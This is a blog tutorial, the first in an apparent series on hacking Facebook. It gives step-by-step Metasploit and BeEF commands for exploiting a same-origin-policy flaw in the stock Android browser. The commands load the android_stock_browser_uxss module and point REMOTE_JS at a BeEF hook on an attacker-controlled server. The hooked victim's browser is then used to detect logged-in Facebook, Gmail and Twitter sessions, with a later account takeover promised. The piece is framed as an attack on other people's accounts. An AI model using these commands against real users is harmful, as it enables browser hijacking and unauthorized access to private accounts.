This is the initial post of a new series on how to hack Facebook.
It's important to note here that each hack I'll be covering is very
specific. I have said it before, but I feel I need to repeat it again:
there is NO SILVER BULLET that works under all circumstances. Obviously,
the good folks at Facebook have taken precautions to make certain that
their app is not hacked, but if we are creative, persistent, and
ingenious, we can still get in.
Facebook
is one of the most secure applications on the Internet and, despite
what you might read on the Internet, it is NOT easy to hack. In
addition, most of those websites on the Internet willing to sell you a
Facebook hack are scams. Don't give them a penny!
If you want to
hack Facebook, you need to invest some time into learning. If you are
new to hacking, you might want to start with my article "How to Use Null Byte to Study to Become a Professional Hacker."
In
addition, I want to put in a word about what we mean by the word
"hack." In some cases, we might get the password which, of course, will
give us full access to the Facebook account. In other cases, we might
just get access to the account without any rights. In still other
schemes, we might get the cookies that Facebook places in the user's
browser and then place it in our browser for access to the account
whenever we please. In yet another scenario, we can place ourselves
between the user and Facebook in a form of MitM attack, to get the
password, etc.
In this first entry in this series,
we will use a flaw in the stock Android web browser that will provide
us with access to the Facebook account. I hope it goes without saying
that this hack will only work when the user has accessed their Facebook
account from the stock Android browser, not the Facebook mobile app.
Although Google is aware of this security flaw in their browser, it is
not automatically patched or replaced on existing systems. As a result,
this hack will work on most Android systems.
Same Origin Policy
Same-origin
policy (SOP) is one of the key security measures that every browser
should meet. What it means is that browsers are designed so that
webpages can't load code that is not part of their own resource. This
prevents attackers from injecting code without the authorization of the
website owner.
Unfortunately, the default Android browser can be
hacked as it does not enforce the SOP policy adequately. In this way, an
attacker can access the user's other pages that are open in the
browser, among other things. This means that if we can get the user to
navigate to our website and then send them some malicious code, we can
then access other sites that are open in their browser, such as
Facebook.
For those of you are new to Null Byte and hacking, I recommend that you start by installing Kali Linux. In this hack, we will need two tools, Metasploit and BeEF, both of which are built into our Kali Linux system.
Step 1Open Metasploit
Let's begin by firing up Kali and then opening Metasploit by typing: kali > msfconsole
You should get a screen like this.
For those of you unfamiliar with Metasploit, check out my series on using Metasploit for more information on using it successfully.
Step 2Find the Exploit
Next, let's find the exploit for this hack by typing: msf > search platform:android stock browser
When we do so, we get only one module: auxiliary/gather/android_stock_browser_uxss
Let's load that module by typing: msf > use auxiliary/gather/android_stock_browser_uxss
Step 3Get the Info
Now that we have loaded the module, let's get some information on this module. We can do this by typing: msf > info
As
you can see from this info page, this exploit works against all stock
Android browsers before Android 4.4 KitKat. It tells us that this module
allows us to run arbitrary JavaScript in the context of the URL.
Step 4Show Options
Next, let see what options we need to set for this module to function. Most importantly, we need to set the REMOTE_JS that I have highlighted below.
Step 5Open BeEF
Now, open BeEF. Please take a look at this tutorial on using BeEF, if you are are unfamiliar the tool.
Step 6Set JS to BeEF Hook
Back
to Metasploit now. We need to set the REMOTE_JS to the hook on BeEF. Of
course, make certain you use the IP of the server that BeEF is running
on. msf > set REMOTE_JS http://192.168.1.107:3000/hook.js
Next, we need to set the URIPATH to the root directory /. Let's type: msf > set uripath /
Step 7Run the Server
Now
we need to start the Metasploit web server. What will happen now is
that Metasploit will start its web server and serve up the BeEF hook so
that when anyone navigates to that website, it will have their browser
hooked to BeEF. msf > run
Step 8Navigate to the Website from an Android Browser
Now
we are replicating the behavior of the victim. When they navigate to
the website hosting the hook, it will automatically inject the
JavaScript into their browser and hook it. So, we need to use the stock
browser on an Android device and go to 192.168.1.107:8080, or whatever
the IP is of your website.
Step 9Hook Browser
When
the user/device visits our web server at 192.168.1.107, the BeEF
JavaScript will hook their browser. It will show under the "Hooked
Browser" explorer in BeEF. We now control their browser!
Step 10Detect if the Browser Is Authenticated to Facebook
Now
let's go back to BeEF and go to the "Commands" tab. Under the "Network"
folder we find the "Detect Social Networks" command. This command will
check to see whether the victim is authenticated to Gmail, Facebook, or
Twitter. Click on the "Execute" button in the lower right.
When
we do so, BeEF will return for us the results. As you can see below,
BeEF returned to us that this particular user was not authenticated to
Gmail or Facebook, but was authenticated to Twitter.
Now,
we need to simply wait until the user is authenticated to Facebook and
attempt this command again. Once they have authenticated to Facebook, we
can direct a tab to open the user's Facebook page, which we will do in
our next Facebook hack tutorial.
We
will continue to explore more ways to hack Facebook, Twitter, and Gmail
in future articles, so keep coming back, my budding hackers!
No comments:
Post a Comment